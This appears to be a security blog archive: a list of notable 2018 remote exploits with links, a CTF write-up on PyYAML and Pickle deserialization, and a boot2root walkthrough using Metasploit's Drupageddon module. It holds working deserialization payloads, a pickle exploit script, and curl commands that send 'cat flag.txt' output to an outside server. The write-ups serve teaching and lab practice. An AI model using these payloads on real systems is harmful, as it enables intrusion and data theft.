Top 10 Remote Exploits of 2018

With 2018 over, I thought it would be useful to look back at the most notable exploits to come out in the last year and provide a brief review for each. My criterion here is to list the most notable remote exploits (in my opinion…) affecting the most systems with the highest impact, released in 2018 only. This is by no means a complete list and I may have missed some. If so, let me know via Twitter (@xer0dayz) or leave a comment. Also, if there are any remote exploits you think I should add to Sn1per (https://github.com/1N3/Sn1per), let me know!

OpenSSH User Enum Exploit CVE-2018-15473

OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.

Exploit Link: https://github.com/Rhynorater/CVE-2018-15473-Exploit

* Autopwn module added to Sn1per v6.0 (https://github.com/1N3/Sn1per)

libSSH Auth Bypass Exploit CVE-2018-10933

A vulnerability was found in libssh’s server-side state machine before versions 0.7.6 and 0.8.4. A malicious client could create channels without first performing authentication, resulting in unauthorized access.

Exploit Link: https://github.com/leapsecurity/libssh-scanner

* Autopwn module added to Sn1per v6.0 (https://github.com/1N3/Sn1per)

Drupal v7.x + v8.x Remote Code Execution (Drupalgeddon 2 / CVE-2018-7600 / SA-CORE-2018-002)

A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. The root cause is the Form API accepting render-array keys (those starting with #) from user-supplied input, which lets an unauthenticated request hand a callback such as exec to the renderer. It was fixed in Drupal 7.58, 8.5.1, 8.4.6 and 8.3.9 (SA-CORE-2018-002). A follow-up fix for the same bug class, SA-CORE-2018-004 (CVE-2018-7602), shipped in 7.59 and 8.5.3; both have been exploited in the wild.

Exploit Link: https://github.com/dreadlocked/Drupalgeddon2

* Autopwn module added to Sn1per v6.0 (https://github.com/1N3/Sn1per)

Apache Struts 2 Remote Code Execution CVE-2018-11776

Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (set either by the user or by a plugin such as the Convention Plugin) and, in addition, either (a) results are used with no namespace while the enclosing package has no namespace or a wildcard namespace, or (b) a url tag is used with no value and action set while the enclosing package has no namespace or a wildcard namespace. In both cases the namespace is taken from the request URL and evaluated as an OGNL expression, which is what the exploit below abuses.

Exploit Link: https://github.com/mazen160/struts-pwn_CVE-2018-11776

* Autopwn module added to Sn1per v6.0 (https://github.com/1N3/Sn1per)

WebLogic Unrestricted File Upload Remote Code Execution CVE-2018-2894

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS – Web Services). Supported versions that are affected are 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Exploit Link: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/WebLogic%20CVE-2018-2894.py

Cisco ASA Directory Traversal CVE-2018-0296

A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic. This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products: 3000 Series Industrial Security Appliance (ISA), ASA 1000V Cloud Firewall, ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4100 Series Security Appliance, Firepower 9300 ASA Security Module, FTD Virtual (FTDv). Cisco Bug IDs: CSCvi16029.

Exploit Link: https://github.com/yassineaboukir/CVE-2018-0296

* Autopwn module added to Sn1per v6.0 (https://github.com/1N3/Sn1per)

Exim < 4.90.1 Remote Code Execution CVE-2018-6789

An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. By sending a handcrafted message, a buffer overflow may happen. This can be used to execute code remotely.

Exploit Link: https://www.exploit-db.com/exploits/44571

* To be added to Sn1per v6.1 at a future date.

DHCP Client Command Injection (DynoRoot) CVE-2018-1111

DHCP packages in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to a command injection flaw in the NetworkManager integration script included in the DHCP client. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.

Exploit Link: https://github.com/kkirsche/CVE-2018-1111

osCommerce 2.3.4.1 Installer Unauthenticated Code Execution

If the /install/ directory was not removed, it is possible for an unauthenticated attacker to run the “install_4.php” script, which will create the configuration file for the installation. This allows the attacker to inject PHP code into the configuration file and execute it.

Exploit Link: https://www.rapid7.com/db/modules/exploit/multi/http/oscommerce_installer_unauth_code_exec

* To be added to Sn1per v6.1 at a future date.

Oracle Weblogic Server Deserialization RCE CVE-2018-2628

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Exploit Link: https://www.rapid7.com/db/modules/exploit/multi/misc/weblogic_deserialize

* Autopwn module added to Sn1per v6.0 (https://github.com/1N3/Sn1per)

Exploiting Python Deserialization Vulnerabilities

Over the weekend, I had a chance to participate in the ToorConCTF (https://twitter.com/toorconctf) which gave me my first experience with serialization flaws in Python. Two of the challenges we solved included Python libraries that appeared to be accepting serialized objects and ended up being vulnerable to Remote Code Execution (RCE). Since I struggled a bit to find reference material online on the subject, I decided to make a blog post documenting my discoveries, exploit code and solutions. In this blog post, I will cover how to exploit deserialization vulnerabilities in the PyYAML (a Python YAML library) and Python Pickle libraries (a Python serialization library). Let’s get started!

Background


Before diving into the challenges, it’s probably important to start with the basics. If you are unfamiliar with deserialization vulnerabilities, the following excerpt from @breenmachine at Fox Glove Security (https://foxglovesecurity.com) probably explains it the best.

“Unserialize vulnerabilities are a vulnerability class. Most programming languages provide built-in ways for users to output application data to disk or stream it over the network. The process of converting application data to another format (usually binary) suitable for transportation is called serialization. The process of reading data back in after it has been serialized is called unserialization. Vulnerabilities arise when developers write code that accepts serialized data from users and attempt to unserialize it for use in the program. Depending on the language, this can lead to all sorts of consequences, but most interesting, and the one we will talk about here is remote code execution.”

PyYAML Deserialization Remote Code Execution


In the first challenge, we were presented with a URL to a web page which included a YAML document upload form. After Googling for YAML document examples, I crafted the following YAML file and proceeded to upload it to get a feel for the functionality of the form.

HTTP Request


POST / HTTP/1.1
Host: ganon.39586ebba722e94b.ctf.land:8001
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://ganon.39586ebba722e94b.ctf.land:8001/
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------200783363553063815533894329
Content-Length: 857

-----------------------------200783363553063815533894329
Content-Disposition: form-data; name="file"; filename="test.yaml"
Content-Type: application/x-yaml

---
# A list of global configuration variables
# # Uncomment lines as needed to edit default settings.
# # Note this only works for settings with default values. Some commands like --rerun <module>
# # or --force-ccd n will have to be set in the command line (if you need to)
#
# # This line is really important to set up properly
# project_path: '/home/user'
#
# # The rest of the settings will default to the values set unless you uncomment and change them
# #resize_to: 2048
'test'
-----------------------------200783363553063815533894329
Content-Disposition: form-data; name="upload"


-----------------------------200783363553063815533894329--

HTTP/1.1 200 OK
Server: gunicorn/19.7.1
Date: Sun, 03 Sep 2017 02:50:16 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2213
Set-Cookie: session=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/

<!-- begin message block -->
<div class="container flashed-messages">
  <div class="row">
    <div class="col-md-12">
      <div class="alert alert-info" role="alert">

        test.yaml is valid YAML
      </div>
    </div>
  </div>
</div>
<!-- end message block -->

    </div>

</div>

  <div class="container main" >
    <div class="row">
        <div class="col-md-12 main">
            
  <code></code>

As you can see, the document was uploaded successfully but only displayed whether the upload was a valid YAML document or not. At this point, I wasn’t sure exactly what I was supposed to do, but after looking more closely at the response, I noticed that the server was running gunicorn/19.7.1…

A quick search for gunicorn revealed that it is a Python web server, which led me to believe the YAML parser was in fact a Python library. From here, I decided to search for Python YAML vulnerabilities and discovered a few blog posts referencing PyYAML deserialization flaws. It was here that I came across the following exploit code for exploiting PyYAML deserialization vulnerabilities. The important thing here is the following code, which runs the ‘ls’ command if the application is vulnerable to PyYAML deserialization:


!!map {
  ? !!str "goodbye"
  : !!python/object/apply:subprocess.check_output [
    !!str "ls",
  ],
}

Going blind into the exploitation phase, I decided to give it a try and inject the payload into the document contents being uploaded using Burp Suite…

HTTP Request


POST / HTTP/1.1
Host: ganon.39586ebba722e94b.ctf.land:8001
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://ganon.39586ebba722e94b.ctf.land:8001/
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------200783363553063815533894329
Content-Length: 445

-----------------------------200783363553063815533894329
Content-Disposition: form-data; name="file"; filename="test.yaml"
Content-Type: application/x-yaml

---
!!map {
  ? !!str "goodbye"
  : !!python/object/apply:subprocess.check_output [
    !!str "ls",
  ],
}

-----------------------------200783363553063815533894329
Content-Disposition: form-data; name="upload"


-----------------------------200783363553063815533894329--

<ul><li><code>goodbye</code> : <code>Dockerfile
README.md
app.py
app.pyc
bin
boot
dev
docker-compose.yml
etc
flag.txt
home
lib
lib64
media
mnt
opt
proc
requirements.txt
root
run
sbin
srv
static
sys
templates
test.py
tmp
usr
var
</code></li></ul>

As you can see, the payload worked and we now have code execution on the target server! Now, all we need to do is read the flag.txt…

I quickly discovered a limitation of the above method: it was strictly limited to single commands (i.e. ls, whoami, etc.), which meant there was no way to read the flag using this method. I then discovered that the os.system Python call could also be used to achieve RCE and was capable of running multiple commands inline. However, I was quickly disappointed after trying this and seeing that the result just returned “0” and I could not see my command output. After struggling to find the solution, my teammate @n0j pointed out that os.system [“command_here”] only returns a “0” exit code if the command is successful and is blind due to how Python handles subprocess execution. It was here that I tried injecting the following command to read the flag: curl https://crowdshield.com/?`cat flag.txt`

HTTP Request


POST / HTTP/1.1
Host: ganon.39586ebba722e94b.ctf.land:8001
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://ganon.39586ebba722e94b.ctf.land:8001/
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------200783363553063815533894329
Content-Length: 438

-----------------------------200783363553063815533894329
Content-Disposition: form-data; name="file"; filename="test.yaml"
Content-Type: application/x-yaml

---
"goodbye": !!python/object/apply:os.system ["curl https://crowdshield.com/?`cat flag.txt`"]

-----------------------------200783363553063815533894329
Content-Disposition: form-data; name="upload"


-----------------------------200783363553063815533894329--


</div>

  <div class="container main" >
    <div class="row">
        <div class="col-md-12 main">
            
  <ul><li><code>goodbye</code> : <code>0</code></li></ul>
            
        </div>
    </div>
  </div>

After much trial and error, the flag was ours along with 250pts in the CTF!

Remote Apache Logs


34.214.16.74 - - [02/Sep/2017:21:12:11 -0700] "GET /?ItsCaptainCrunchThatsZeldasFavorite HTTP/1.1" 200 1937 "-" "curl/7.38.0"
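To make the mechanics above reproducible without the CTF box, here is an added example (not code from the original post, the challenge, or the PyYAML project) that feeds a document of the same !!python/object/apply shape to the loader the app must have been using, and then to yaml.safe_load. It assumes PyYAML is installed (pip install pyyaml) and a POSIX host with an echo binary; the argv list ["echo", "pwned"] stands in for the ls and curl commands used in the challenge.

```python
"""Added example: PyYAML unsafe vs. safe loading (Python 3, needs PyYAML)."""
import subprocess  # noqa: F401  (the payload names this module; the loader imports it)

try:
    import yaml
except ImportError:  # PyYAML not installed: demo() returns None instead of crashing
    yaml = None

# Constructed payload in the same shape as the one used against the CTF form.
# !!python/object/apply:<module>.<name> makes the full loader import <module>,
# look up <name> and call it with the listed arguments; here a single argv list.
RCE_PAYLOAD = """\
!!map {
  ? !!str "goodbye"
  : !!python/object/apply:subprocess.check_output [
    [!!str "echo", !!str "pwned"],
  ],
}
"""


def vulnerable_load(document):
    """What the challenge app effectively did: yaml.load with the full Loader,
    which honours every python/* tag (in PyYAML < 5.1 a bare yaml.load() did this)."""
    return yaml.load(document, Loader=yaml.Loader)


def hardened_load(document):
    """yaml.safe_load only builds plain YAML types (map, seq, str, int, ...);
    a python/* tag raises ConstructorError before anything is imported or called."""
    return yaml.safe_load(document)


def demo():
    """Returns (command output from the unsafe path, whether safe_load refused it)."""
    if yaml is None:
        return None
    executed = vulnerable_load(RCE_PAYLOAD)["goodbye"]  # b"pwned\n": the command ran
    try:
        hardened_load(RCE_PAYLOAD)
        blocked = False
    except yaml.constructor.ConstructorError:
        blocked = True
    return executed, blocked


if __name__ == "__main__":
    print(demo())
```

The loader choice is the whole story: with yaml.Loader the document is executed during parsing, before the application even looks at the result, so the "is valid YAML" check in the response came too late to matter. yaml.safe_load (or a SafeLoader subclass with only the tags you need registered) is the fix on the server side.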


Python Pickle Deserialization


In the next CTF challenge, we were provided a host and port to connect to (ganon.39586ebba722e94b.ctf.land:8000). After the initial connection, however, no noticeable output was displayed, so I proceeded to fuzz the open port with random characters and HTTP requests to see what happened. It wasn’t until I tried injecting a single “‘” character that I received the error below:


# nc -v ganon.39586ebba722e94b.ctf.land 8000
ec2-34-214-16-74.us-west-2.compute.amazonaws.com [34.214.16.74] 8000 (?) open
cexceptions
AttributeError
p0
(S"Unpickler instance has no attribute 'persistent_load'"
p1
tp2
Rp3
.

The thing that stood out most was the (S"Unpickler instance has no attribute 'persistent_load'" portion of the output. I immediately searched Google for the error, which revealed several references to Python’s serialization library called “Pickle”.

It soon became clear that obtaining the flag likely involved another Python deserialization flaw. I then searched Google for “Python Pickle deserialization exploits” and discovered a similar PoC to the code below. After tinkering with the code a bit, I had a working exploit that would send Pickle serialized objects to the target server with the commands of my choice.

Exploit Code


#!/usr/bin/python
# Python Pickle De-serialization Exploit by [email protected] - https://crowdshield.com
# (Python 2: uses cPickle and the print statement; the target spoke protocol 0 pickles)
#

import cPickle
import os
import socket

# Exploit that we want the target to unpickle: __reduce__ tells the unpickler
# to call os.system() with our command string, so it runs on the target.
class Exploit(object):
    def __reduce__(self):
        # Note: os.system is blind (only the exit code comes back), so the flag
        # is exfiltrated through the curl request to a server we control.
        return (os.system, ('curl https://crowdshield.com/.injectx/rce.txt?`cat flag.txt`',))

def serialize_exploit():
    shellcode = cPickle.dumps(Exploit())
    return shellcode

def insecure_deserialize(exploit_code):
    # Local reproduction of what the vulnerable service does with our bytes.
    cPickle.loads(exploit_code)

if __name__ == '__main__':
    shellcode = serialize_exploit()
    print shellcode

    soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    soc.connect(("ganon.39586ebba722e94b.ctf.land", 8000))
    print soc.recv(1024)

    soc.send(shellcode)
    print soc.recv(1024)
    soc.close()

Exploit PoC


# python python_pickle_poc.py
cposix
system
p1
(S"curl https://crowdshield.com/rce.txt?`cat flag.txt`"
p2
tp3
Rp4
.

Much to my surprise, this worked and I could see the contents of the flag in my Apache logs!

Remote Apache Logs


34.214.16.74 - - [03/Sep/2017:11:15:02 -0700] "GET /rce.txt?UsuallyLinkPrefersFrostedFlakes HTTP/1.1" 404 2102 "-" "curl/7.38.0"
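The PoC above is Python 2 and needs the challenge server. As an added example (not code from the post or the challenge), here is a Python 3 version of the same __reduce__ trick run locally, next to the standard defence: an Unpickler subclass whose find_class() only resolves an allow-list of globals. It assumes a POSIX host (os.getcwd pickles as posix.getcwd, matching the cposix prefix in the output above); os.getcwd is a harmless stand-in for the os.system call in the real payload, and the allow-list contents are my choice for the demo.

```python
"""Added example (Python 3): the __reduce__ trick used against the CTF service,
beside an Unpickler that refuses it.  Not code from the post or the challenge."""
import datetime
import io
import os
import pickle


class Exploit:
    """Pickling this stores no data, only an instruction: when the bytes are
    unpickled, call os.getcwd() with no arguments.  os.getcwd is a harmless,
    deterministic stand-in for the os.system(...) used in the real PoC."""

    def __reduce__(self):
        return (os.getcwd, ())


def build_payload():
    # protocol 0 gives the readable 'cposix\ngetcwd\n...' form seen in the post's output
    return pickle.dumps(Exploit(), protocol=0)


def vulnerable_loads(data):
    """What the challenge service did: trust the bytes completely."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list the globals a stream may reference.  pickle resolves every
    GLOBAL/STACK_GLOBAL opcode through find_class(), so refusing there stops
    posix.getcwd, posix.system, subprocess.* etc. before they can be called."""

    ALLOWED = {("datetime", "datetime"), ("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def demo():
    """Returns (payload ran under pickle.loads, payload refused by the restricted
    unpickler, benign data still round-trips through the restricted unpickler)."""
    payload = build_payload()
    ran = vulnerable_loads(payload) == os.getcwd()
    try:
        restricted_loads(payload)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    record = {"when": datetime.datetime(2017, 9, 3, 11, 15, 2), "n": [1, 2]}
    roundtrip_ok = restricted_loads(pickle.dumps(record)) == record
    return ran, blocked, roundtrip_ok


if __name__ == "__main__":
    print(build_payload())
    print(demo())
```

The allow-list is a mitigation for code that must keep accepting pickles; the better fix is to not expose pickle to untrusted peers at all, or to authenticate the bytes (for example an HMAC over the payload checked before unpickling) so that only a holder of the key can produce a stream the service will load.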

Conclusion


So there you have it. Two practical examples of Python serialization which can be used to obtain Remote Code Execution (RCE) in remote applications. I had a lot of fun competing in the CTF and learned a lot in the process, but due to other obligations and time constraints I wasn’t able to put my entire focus into the CTF. In the end, our team “SavageSubmarine” placed 7th overall. Till next time…

-1N3


Droopy Boot2Root CTF Solution

Overview

This is a step by step walk through for the Droopy CTF Boot2Root VM which can be downloaded here. Some output has been omitted for brevity, but you get the drift 😉 Enjoy! -1N3 @CrowdShield

Enumeration

As with most pentests, I rely mainly on Sn1per which can be downloaded here to quickly enumerate targets and pinpoint possible exploit vectors…

# sniper 192.168.1.66 web report
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[http://crowdshield.com
 + -- --=[sn1per v1.7 by 1N3

################################### Running TCP port scan ##########################

Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-11 08:28 MST
Nmap scan report for 192.168.1.66
Host is up (0.00027s latency).
Not shown: 35 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:4E:A5:E0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.66
+ Target Hostname:    192.168.1.66
+ Target Port:        80
+ Start Time:         2016-05-11 08:28:13 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /scripts/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x60e 0x4fef78de7d280 
+ OSVDB-3268: /includes/: Directory indexing found.
+ Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /misc/: Directory indexing found.
+ Entry '/misc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /modules/: Directory indexing found.
+ Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /profiles/: Directory indexing found.
+ Entry '/profiles/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/scripts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /themes/: Directory indexing found.
+ Entry '/themes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 36 entries which should be manually viewed.
+ Multiple index files found: /index.php, /index.html
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /scripts/: This might be interesting... possibly a system shell found.
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-3268: /sites/: Directory indexing found.
+ 8384 requests: 0 error(s) and 52 item(s) reported on remote host
+ End Time:           2016-05-11 08:28:36 (GMT-7) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.8
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________


[!] [!] The remote website is up, but does not seem to be running WordPress.

[-] Date & Time: 11/05/2016 08:28:42
[-] Target: http://192.168.1.66
[M] Website Not in HTTPS: http://192.168.1.66
[I] Server: Apache/2.4.7 (Ubuntu)
[I] X-Powered-By: PHP/5.5.9-1ubuntu4.5
[L] X-Generator: Drupal 7 (http://drupal.org)
[L] X-Frame-Options: Not Enforced
[I] Strict-Transport-Security: Not Enforced
[I] X-Content-Security-Policy: Not Enforced
[I] X-Content-Type-Options: Not Enforced
[L] Robots.txt Found: http://192.168.1.66/robots.txt
[I] CMS Detection: Drupal
[I] Drupal Version: 7.30
[H] Drupal Vulnerable to SA-CORE-2014-005
[-] Date & Time: 11/05/2016 08:30:00
[-] Completed in: 0:01:18

[-] Date & Time: 11/05/2016 08:30:01
[-] Target: http://192.168.1.66/wordpress

Exploitation

Since we now know the site is vulnerable to SA-CORE-2014-005 (i.e. Drupageddon), we can quickly find the exploit using Findsploit which can be downloaded here.

   ___ _           _           _       _ _   
  / __(_)_ __   __| |___ _ __ | | ___ (_) |_ 
 / _\ | | '_ \ / _` / __| '_ \| |/ _ \| | __|
/ /   | | | | | (_| \__ \ |_) | | (_) | | |_ 
\/    |_|_| |_|\__,_|___/ .__/|_|\___/|_|\__|
                        |_|                  

+ -- --=[findsploit v1.3 by 1N3
+ -- --=[https://crowdshield.com

+ -- --=[SEARCHING:  drupal   

+ -- --=[NMAP SCRIPTS

/usr/share/nmap/scripts/http-drupal-enum.nse
/usr/share/nmap/scripts/http-drupal-enum-users.nse

+ -- --=[METASPLOIT EXPLOITS

msf_search/auxiliary:   gather/drupal_openid_xxe                                       2012-10-17       normal  Drupal OpenID External Entity Injection
msf_search/auxiliary:   scanner/http/drupal_views_user_enum                            2010-07-02       normal  Drupal Views Module Users Enumeration
msf_search/exploits:   multi/http/drupal_drupageddon                                  2014-10-15       excellent  Drupal HTTP Parameter Key/Value SQL Injection

+ -- --=[Press any key to search online or Ctrl+C to exit...

Drupageddon Exploit

Next, we load up the exploit in Metasploit and fire away for an easy shell…

msf exploit(drupal_drupageddon) > set RHOST 192.168.1.66
RHOST => 192.168.1.66
msf exploit(drupal_drupageddon) > exploit
[*] 192.168.1.66:80 - Testing page
[*] Started bind handler
[*] 192.168.1.66:80 - Creating new user KJGWAaMEnU:QwWtLlTZxw
[*] 192.168.1.66:80 - Logging in as KJGWAaMEnU:QwWtLlTZxw
[*] 192.168.1.66:80 - Trying to parse enabled modules
[*] 192.168.1.66:80 - Enabling the PHP filter module
[*] 192.168.1.66:80 - Setting permissions for PHP filter module
[*] 192.168.1.66:80 - Getting tokens from create new article page
[*] 192.168.1.66:80 - Calling preview page. Exploit should trigger...
[*] Sending stage (32461 bytes) to 192.168.1.66
[*] Meterpreter session 1 opened (192.168.1.60:58733 -> 192.168.1.66:4444) at 2016-04-29 14:04:18 -0700
meterpreter > ls
Listing: /var/www/html
======================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  89339  fil   2014-12-11 06:11:45 -0700  CHANGELOG.txt
100644/rw-r--r--  1481   fil   2014-12-11 06:11:45 -0700  COPYRIGHT.txt
100644/rw-r--r--  1717   fil   2014-12-11 06:11:45 -0700  INSTALL.mysql.txt
100644/rw-r--r--  1874   fil   2014-12-11 06:11:45 -0700  INSTALL.pgsql.txt
100644/rw-r--r--  1298   fil   2014-12-11 06:11:45 -0700  INSTALL.sqlite.txt
100644/rw-r--r--  17995  fil   2014-12-11 06:11:45 -0700  INSTALL.txt
100664/rw-rw-r--  18092  fil   2014-12-11 06:11:45 -0700  LICENSE.txt
100644/rw-r--r--  8542   fil   2014-12-11 06:11:45 -0700  MAINTAINERS.txt
100644/rw-r--r--  5382   fil   2014-12-11 06:11:45 -0700  README.txt
100644/rw-r--r--  9642   fil   2014-12-11 06:11:45 -0700  UPGRADE.txt
100644/rw-r--r--  6604   fil   2014-12-11 06:11:45 -0700  authorize.php
100644/rw-r--r--  720    fil   2014-12-11 06:11:45 -0700  cron.php
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  includes
100644/rw-r--r--  11510  fil   2014-12-11 06:11:45 -0700  index.html
100644/rw-r--r--  529    fil   2014-12-11 06:11:45 -0700  index.php
100644/rw-r--r--  20     fil   2014-12-11 06:11:45 -0700  info.php
100644/rw-r--r--  703    fil   2014-12-11 06:11:45 -0700  install.php
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  misc
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  modules
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  profiles
100644/rw-r--r--  1550   fil   2014-12-11 06:11:45 -0700  robots.txt
